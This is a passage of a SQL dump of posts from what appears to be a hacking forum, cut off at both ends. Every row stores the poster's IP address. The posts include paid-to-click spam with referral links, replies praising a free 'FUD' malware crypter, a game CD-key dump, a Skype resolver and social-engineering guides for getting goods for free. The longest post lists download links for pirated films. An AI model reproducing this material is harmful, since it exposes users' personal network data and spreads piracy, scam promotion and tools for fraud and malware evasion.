`edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6087', '1057', '0', '9', 'oldest ptc site with more earning option', '17', '255', 'sbhshroy2', '1350902831', 'guaranted income earn lots of money by clicking ads it is the oldest ptc site who pays user from 12 yrs join and earn lots of money. Paid to Click - Click on ads and get paid up to 0.01$ each Paid to Read - Read short ads followed by a quick look at a page, paid up to 0.0025$ each.. get upto 0.01$ referral per click u earn upto 12$ per day doing small jobs. Minimum payout is as low as 2$ via paypal and you will receive your payment within 24-72 hours! join by clicking http://adf.ly/DvahO', '112.110.15.228', '1886261220', '0', '0', '255', '1350903461', '1', 'e85745f94d9a94b8bcaedecbfb3c5643', '0', '1350903461'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6092', '1059', '0', '9', 'new ptc site with more earning option', '17', '255', 'sbhshroy2', '1350903502', 'guaranted income earn lots of money by clicking ads join and earn lots of money. Paid to Click - Click on ads and get paid up to 0.01$ each Paid to Read - Read short ads followed by a quick look at a page, paid up to 0.0025$ each.. Sign up - Complete sign up offers for free sites and receive 5-25 cents. Paid to Promote -Promote Scarlet-clicks.info and get up to 0.20$ CPM. Click Exchange - Click to earn x-credits and use it to advertise what you want. 40% DOWNLINE EARNINGS! (Up to 100% for Upgraded members) Minimum payout is as low as 0,3$ and you will receive your payment within 24-72 hours! We have some special offers and memberships so be sure to check those out. join by clicking http://adf.ly/DvamZ', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '75e49b2dc7f6b0430c5c9da937caa4b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6088', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1350903009', 'Probably not FUD but I\'m assuming is like %90 UD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'ddd3c6643a71b7f32ead76552ad2350d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6089', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '100', '??zg???g????61', '1350903078', 'Holy jesus, thanks man. This is huge.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9dbc8fd8a9c79462097ffbb43164a129', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6090', '1058', '0', '24', 'Microsoft or Apple', '0', '228', 'VirtualLegend', '1350903117', '[color=#1E90FF][size=medium][align=center][color=#9400D3]The Title says it all, What do you think is better Microsoft or Apple. I prefer Microsoft because i don\'t like Apple products so much. Only the Ipad and the Iphone (That each years becomes bigger until it\'s a ipad) :P What do you think? Post your Comment Below[/color][/align][/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'bb0c868b7dc9538d062e553bf84acb08', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6091', '902', '6053', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '228', 'VirtualLegend', '1350903396', '[quote=\'Apathy\' pid=\'6053\' dateline=\'1350877006\'] Have you made it yet? :P [/quote] No, I have lost my hole project on VB', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1fab8e4b97964eef0b7ff03bd19ae53a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6093', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1350905653', 'Thanks bro I\'m trying :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'fbb9729dabd6f1c4e5fce172a3e4f108', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6094', '1039', '5998', '61', 'RE: Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '62', 'R?????zo?', '1350905746', '[quote=\'iTzIpod\' pid=\'5998\' dateline=\'1350862037\'] I\'ve seen this method multiple times. I don\'t think it\'ll help a person like me though. :p But oh well. Different people = Different opinions. :) I would\'ve leaked it onto LH but then I thought it was LQ and wouldn\'t help anyone. Again, that\'s my opinion. [/quote] yeah that\'s true but have you seen the SE guide this same guy made? I\'ts awesome.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '56c303cb065b06cbeb96cc0cbc42aacd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6095', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1350905806', 'Enjoy your stay VirtualLegend! :)', '24.212.197.164', '416597412', '1', '0', '82', '1350905817', '1', '47bf14f5255e4c06b3d7348bdbcf8f6d', '0', '1350905817'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6096', '1041', '5994', '81', 'RE: How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '62', 'R?????zo?', '1350905861', 'Looks legit bro, thanks for the share :D', '94.132.244.168', '1585771688', '1', '0', '62', '1350905906', '1', '2eed3bb20bdcc0b25d3c3072312374ea', '0', '1350905906'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6097', '1047', '6049', '16', 'RE: Get free Otterbox cases!', '0', '82', 'iTzIpod', '1350905931', 'I always wanted to SE items from Otterbox but I didn\'t know the guide :p Thanks. Will try and post results.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9383dd24596a049eecded69499fcd152', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6098', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '62', 'R?????zo?', '1350905972', 'was not from SE.net, I didn\'t even knew that site :P Oh well, might help some people though :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a58093b45e5daa7b88292ef1058c99c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6099', '212', '6044', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350905987', '[quote=\'t3h jok3r\' pid=\'6044\' dateline=\'1350875829\'] You got saved by Ipods post :) Group Approved. Group will be added soon. [/quote] Lol what if I didn\'t post that? What would happen?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97cac64983130f96aa376d649347e3eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6100', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '62', 'R?????zo?', '1350906029', 'Always glad to help :) Enjoy.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ab35384d9cbc65bc7599c1b2e30b998f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6101', '1045', '6037', '49', 'RE: Group Format?', '0', '82', 'iTzIpod', '1350906070', 'I\'ve always wanted this plugin :p It\'s really cool but t3h jok3r declined it. I\'m tired of Unique User\'s Usernames being Gray/Grey :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e8eb0aab8daf344ea5bff86e2f424fec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6102', '1036', '5975', '30', 'RE: Mega SEO Pack', '0', '62', 'R?????zo?', '1350906095', 'I decided to share it for premium users so Elite actually means something and worth to upgrade :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7bd118b87718c239d2d59bc582385b64', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6103', '945', '5288', '7', 'RE: I dont want.......', '0', '82', 'iTzIpod', '1350906105', '/Request Close Thread? Reported.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5d060ca3bae7cc4d14484f2864829221', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6104', '1037', '5977', '30', 'RE: Empireviews Type 2 Bot', '0', '62', 'R?????zo?', '1350906130', 'No problem, enjoy guys. :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '85fe443e839d9464ba788f88546e0d4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6105', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '82', 'iTzIpod', '1350906200', '@Reloadzor, we can give that a try. But to fix that problem, you have to post? The plugin blocks ALL the links on the page. I\'m pretty sure.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9b2c42fb3c4c7b29791e0ceaad656f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6106', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '82', 'iTzIpod', '1350906234', 'I hang out on forums now. Kinda talk to some girls. Pretty much it :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3ab0a4e2b967b2c1923d64dd6a923e69', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6107', '1059', '6092', '9', 'RE: new ptc site with more earning option', '0', '82', 'iTzIpod', '1350906278', 'Posting to check it out. Hoping it\'s a great site! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2c31aa8ad89819ffc287cf5c9856a112', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6108', '918', '5088', '65', 'RE: I feel famous', '0', '82', 'iTzIpod', '1350906344', 'What\'s the bug? You probably clicked Post Reply a couple times. That\'s why ^', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1f20bda98d1ed5dfeb2565daef9bcf4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6109', '1045', '6037', '49', 'RE: Group Format?', '0', '228', 'VirtualLegend', '1350907113', 'This is a Awesome idea Keep it Up Bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a84cb155a1bb2c9006419001da4a9c87', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6110', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '228', 'VirtualLegend', '1350907166', 'Playing soccer outside :p', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cd18e75dacdd2bba5567180032ed3607', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6111', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '62', 'R?????zo?', '1350909173', 'yeah if you post it fix that but still pretty annoying if you ask me. Like since your signature has 2 links it blocks two times.', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '0a333b6b58bc07943001cefbf425d060', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6112', '1045', '6101', '49', 'RE: Group Format?', '0', '62', 'R?????zo?', '1350909296', '[quote=\'iTzIpod\' pid=\'6101\' dateline=\'1350906070\'] I\'ve always wanted this plugin :p It\'s really cool but t3h jok3r declined it. I\'m tired of Unique User\'s Usernames being Gray/Grey :/ [/quote] ^this, even though I\'m an upgraded member my username is grey like the other normal members, just because I decide to use Unique userbar.', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '2392a216558e9b668580b6773f36c0c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6113', '1027', '5909', '58', 'RE: [ Updated ] Marketers Group Request', '0', '62', 'R?????zo?', '1350909386', 'Hope it gets approved and I could be part of this group, I see my sexy user bar there :P', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '1606ef7f7bbbfcefe6aa52d8ca412bf0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6114', '212', '5973', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '62', 'R?????zo?', '1350909596', '[quote=\'VirtualLegend\' pid=\'5925\' dateline=\'1350847250\'] [quote=\'iTzIpod\' pid=\'5921\' dateline=\'1350846077\'] Good luck Virtual with the group. Seems nice. Wishing to join it and become successful and a great addition to LH. [/quote] If the group is official i will add you as a member. [/quote] How about me? :( OT: Nice to see that The Marketers got approved :)', '188.140.93.237', '-1131651603', '1', '0', '62', '1350909671', '1', '426c5a3c54473e25cefa760507d21653', '0', '1350909671'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6115', '1059', '6092', '9', 'RE: new ptc site with more earning option', '0', '62', 'R?????zo?', '1350910419', 'thanks for sharing this, I will have a look.', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', 'c3ad04bd07d96db3c9a2fc232389f39f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6116', '1060', '0', '3', '[Bug] with the new plugin', '0', '62', 'R?????zo?', '1350910705', 'So this new plugin to post and to see the link, it\'s great but I don\'t know if it\'s just me or everyone is having this problem When I use quick reply at the bottom of the thread and I type whatever I want and then hit \'post reply\' it simply just refresh the page, what I type is still on the box and my post is done, I have to press F5 to be able to see my post, I thought this was my computer who\'s fucked up but I tried on 2 computers here at work and even on my phone it\'s the same, I think it\'s something with the new plugin? Oh well just try it yourself and see. https://www.google.com/ EDIT: This is not me, it\'s happening to another members too [spoiler] [img]http://i.imgur.com/2JFGz.png[/img] [/spoiler]', '188.140.93.237', '-1131651603', '1', '0', '62', '1350910956', '1', '2dd6f4314d068d1332fc1b501b72a769', '0', '1350910956'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6117', '918', '6108', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350910979', '[quote=\'iTzIpod\' pid=\'6108\' dateline=\'1350906344\'] What\'s the bug? You probably clicked Post Reply a couple times. That\'s why ^ [/quote] I think he meant this bug. http://l33thacking.net/thread-1060.html', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '320fa2519fe5c9049816f1f9a70abb25', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6118', '1061', '0', '64', '[FREE] HUGE MOVIE LIST [DOWNLOAD]', '0', '62', 'R?????zo?', '1350911319', '[quote] [php][B]All Cops Are Bastards BRRip 2012[/B] [CODE]http://turbobit.net/nvqhve09ko9p/All.Cops.Are.Bastards.BRRip.2012.rar.html[/CODE] [CODE]http://rapidgator.net/file/47462844/All.Cops.Are.Bastards.BRRip.2012.rar.html[/CODE] [CODE]http://freakshare.com/files/kcc1sgth/All.Cops.Are.Bastards.BRRip.2012.rar.html[/CODE] [CODE]http://uploaded.net/file/cwd1g5d7/All.Cops.Are.Bastards.BRRip.2012.rar[/CODE] [B]Thats My Boy 2012 BRRip XviD[/B] [CODE]http://turbobit.net/7qgymotb5ja6/Thats.My.Boy.2012.BRRip.XviD.AC3-BTRG.avi.rar.html[/CODE] [CODE]http://rapidgator.net/file/47462636/Thats.My.Boy.2012.BRRip.XviD.AC3-BTRG.avi.rar.html[/CODE] [CODE]http://freakshare.com/files/cwwr2dph/Thats.My.Boy.2012.BRRip.XviD.AC3-BTRG.avi.rar.html[/CODE] [CODE]http://uploaded.net/file/oobuqukf/Thats.My.Boy.2012.BRRip.XviD.AC3-BTRG.avi.rar[/CODE] [B]The Hunger Games 2012BRRip XviD[/B] [CODE]http://turbobit.net/7jmryxmfrhsq/The.Hunger.Games.2012BRRip.XviD-B89.rar.html[/CODE] [CODE]http://rapidgator.net/file/47462962/The.Hunger.Games.2012.PL.BRRip.XviD-B89.rar.html[/CODE] [CODE]http://freakshare.com/files/a0kpl54s/The.Hunger.Games.2012.PL.BRRip.XviD-B89.rar.html[/CODE] [CODE]http://uploaded.net/file/615eiybn/The.Hunger.Games.2012.PL.BRRip.XviD-B89.rar[/CODE] [B]Moonrise Kingdom 2012 BDRip XVID[/B] [CODE]http://turbobit.net/1ww3pk9aec8l/Moonrise.Kingdom.2012.BDRip.XVID.AC3.HQ.Hive-CM8.avi.html[/CODE] [CODE]http://rapidgator.net/file/47464783/Moonrise.Kingdom.2012.BDRip.XVID.AC3.HQ.Hive-CM8.avi.html[/CODE] [CODE]http://freakshare.com/files/1n60xyuk/Moonrise.Kingdom.2012.BDRip.XVID.AC3.HQ.Hive-CM8.avi.html[/CODE] [CODE]http://uploaded.net/file/2ifb3bvh/Moonrise.Kingdom.2012.BDRip.XVID.AC3.HQ.Hive-CM8.avi[/CODE] [B]Super Cyclone 2012 480p BluRay x264[/B] [CODE]http://turbobit.net/9668qsp6nvup/Super.Cyclone.2012.480p.BluRay.x264-mSD.mkv.html[/CODE] [CODE]http://freakshare.com/files/rd8vnjhb/Super.Cyclone.2012.480p.BluRay.x264-mSD.mkv.html[/CODE] [CODE]http://uploaded.net/file/6gcejvzz/Super.Cyclone.2012.480p.BluRay.x264-mSD.mkv[/CODE] [B]Resident Evil Damnation 2012 BRRiP XviD[/B] [CODE]http://turbobit.net/ykfnmq84qb7z/Rsidnt.Evil.Dmntion.2012.TR.BRRiP.XviD.avi.html[/CODE] [CODE]http://rapidgator.net/file/47463918/Rsidnt.Evil.Dmntion.2012.TR.BRRiP.XviD.avi.html[/CODE] [CODE]http://freakshare.com/files/httleqso/Rsidnt.Evil.Dmntion.2012.TR.BRRiP.XviD.avi.html[/CODE] [CODE]http://uploaded.net/file/j26be8j0/Rsidnt.Evil.Dmntion.2012.TR.BRRiP.XviD.avi[/CODE] [B]Mission Impossible - Ghost Protocol 2011[/B] [CODE]http://turbobit.net/8riu1h7bzvhc/Mission.Impossible.Ghost.Protocol.2011.TRUEFRENCH.BRRiP.XviD.AC3-AUTOPSiE.avi.html[/CODE] [B]Wish You Were Here 2012 BRRip XviD[/B] [CODE]http://turbobit.net/ev416rbpgcbw/Wish.You.Were.Here.2012.BRRip.XviD-MeRCuRY.avi.html[/CODE] [CODE]http://rapidgator.net/file/47464040/Wish.You.Were.Here.2012.BRRip.XviD-MeRCuRY.avi.html[/CODE] [CODE]http://freakshare.com/files/mcoosa90/Wish.You.Were.Here.2012.BRRip.XviD-MeRCuRY.avi.html[/CODE] [CODE]http://uploaded.net/file/y9x6fkhl/Wish.You.Were.Here.2012.BRRip.XviD-MeRCuRY.avi[/CODE] [B]The Expatriate 2012 BDRip XviD[/B] [CODE]http://turbobit.net/4yrpyestw721/The.Expatriate.2012.BDRip.XviD-NOSCREENS.avi.html[/CODE] [B]Red Lights 2012 480p BRRip XviD[/B] [CODE]http://turbobit.net/40nwgmx44hhx/Red.Lights.2012.480p.BRRip.XviD.AC3-PTpOWeR.avi.html[/CODE] [B]Klonlar 2012 TR BRRip avi[/B] [CODE]http://turbobit.net/lirvgmb3bed9/Klonlar.2012.TR.BRRip.avi.html[/CODE] [CODE]http://freakshare.com/files/hs8j5zbf/Klonlar.2012.TR.BRRip.avi.html[/CODE] [CODE]http://rapidgator.net/file/47464455/Klonlar.2012.TR.BRRip.avi.html[/CODE] [CODE]http://uploaded.net/file/1xxjvlkq/Klonlar.2012.TR.BRRip.avi[/CODE] [B]The Woman in Black 2012 TR BRRip XviD avi[/B] [CODE]http://turbobit.net/fxmbmbf53qa1/The.Woman.in.Black.2012.TR.BRRip.XviD.avi.html[/CODE] [CODE]http://rapidgator.net/file/47464511/The.Woman.in.Black.2012.TR.BRRip.XviD.avi.html[/CODE] [CODE]http://freakshare.com/files/zpkyk6mk/The.Woman.in.Black.2012.TR.BRRip.XviD.avi.html[/CODE] [CODE]http://uploaded.net/file/ezet338u/The.Woman.in.Black.2012.TR.BRRip.XviD.avi[/CODE] [B]The Tall Man 2012 BRRip XviD avi[/B] [CODE]http://turbobit.net/9qzcuwcegnsv/The.Tall.Man.2012.BRRip.XviD.OpeD.avi.html[/CODE] [CODE]http://freakshare.com/files/yz0hrw3v/The.Tall.Man.2012.BRRip.XviD.OpeD.avi.html[/CODE] [CODE]http://rapidgator.net/file/47464769/The.Tall.Man.2012.BRRip.XviD.OpeD.avi.html[/CODE] [CODE]http://uploaded.net/file/2xo1qi4o/The.Tall.Man.2012.BRRip.XviD.OpeD.avi[/CODE] [B]People Like Us 2012 BRRip XviD[/B] [CODE]http://turbobit.net/irtkorzs335d/People.Like.Us.2012.BRRip.XviD.AC3-BTRG.avi.html[/CODE] [CODE]http://uploaded.net/file/8p2ps5ra/People.Like.Us.2012.BRRip.XviD.AC3-BTRG.avi[/CODE] [B]Escape 2012 DVDRip XviD[/B] [CODE]http://turbobit.net/fgm5sp6fc8rm/Escape.2012.DVDRip.XviD-IGUANA-www.derinport.in.devrimow.avi.html[/CODE] [CODE]http://freakshare.com/files/hrr10zne/Escape.2012.DVDRip.XviD-IGUANA-www.derinport.in.devrimow.avi.html[/CODE] [CODE]http://uploaded.net/file/0woez2ht/Escape.2012.DVDRip.XviD-IGUANA-www.derinport.in.devrimow.avi[/CODE] [B]The Awakening 2011 TR BRRip XviD avi[/B] [CODE]http://turbobit.net/9awovse5phk4/The.Awakening.2011.TR.BRRip.XviD-OpeD.avi.html[/CODE] [CODE]http://freakshare.com/files/80d2agqw/The.Awakening.2011.TR.BRRip.XviD-OpeD.avi.html[/CODE] [CODE]http://rapidgator.net/file/47464872/The.Awakening.2011.TR.BRRip.XviD-OpeD.avi.html[/CODE] [CODE]http://uploaded.net/file/vny16lq8/The.Awakening.2011.TR.BRRip.XviD-OpeD.avi[/CODE] [B]Hamilton 2012 BRRip XviD TR avi[/B] [CODE]http://turbobit.net/acemwmbyy0lc/Hamilton.2012.BRRip.XviD.TR.avi.html[/CODE] [CODE]http://rapidgator.net/file/47465358/Hamilton.2012.BRRip.XviD.TR.avi.html[/CODE] [CODE]http://freakshare.com/files/hekruts9/Hamilton.2012.BRRip.XviD.TR.avi.html[/CODE] [CODE]http://uploaded.net/file/w5e9a48z/Hamilton.2012.BRRip.XviD.TR.avi[/CODE] [B]Naked Soldier 2012 hdtv xvd[/B] [CODE]http://turbobit.net/240ijxc859tv/Naked.Soldier.2012.hdtv.xvd_playnow-www.derinport.in.devrimow.avi.html[/CODE] [CODE]http://freakshare.com/files/3bgukcnn/Naked.Soldier.2012.hdtv.xvd_playnow-www.derinport.in.devrimow.avi.html[/CODE] [CODE]http://uploaded.net/file/zonyw2z3/Naked.Soldier.2012.hdtv.xvd_playnow-www.derinport.in.devrimow.avi[/CODE] [B]Mirror Mirror 2012 480p BRRip XviD[/B] [CODE]http://turbobit.net/roay4y70bys3/Mirror.Mirror.2012.480p.BRRip.XviD-AC3.DuaL.avi.html[/CODE] [CODE]http://freakshare.com/files/6r29xpwr/Mirror.Mirror.2012.480p.BRRip.XviD-AC3.DuaL.avi.html[/CODE] [CODE]http://rapidgator.net/file/47467780/Mirror.Mirror.2012.480p.BRRip.XviD-AC3.DuaL.avi.html[/CODE] [B]The Possesionn 2012 TS Xvid avi[/B] [CODE]http://turbobit.net/93vsk6zy2b9o/The.Possesionn.2012.TS.Xvid-UnKnOwN.avi.html[/CODE] [B]Freelancers 2012 BRRip XviD avi[/B] [CODE]http://turbobit.net/wjms76n86hzv/Freelancers.2012.BRRip.XviD-playXD.avi.html[/CODE] [CODE]http://freakshare.com/files/my2f9a9e/Freelancers.2012.BRRip.XviD-playXD.avi.html[/CODE] [B]General Education 2012 480p BRRip XviD avi[/B] [CODE]http://turbobit.net/5gvop2o2b48x/General.Education.2012.480p.BRRip.XviD.AC3-PTpOWeR.avi.html[/CODE] [B]Goodnight for Justice 2 2012 TR DVDRip XviD[/B] [CODE]http://turbobit.net/pz0dj8cbvxu6/Goodnight.for.Justice.2.2012.TR.DVDRip.XviD.avi.html[/CODE] [B]The Letter 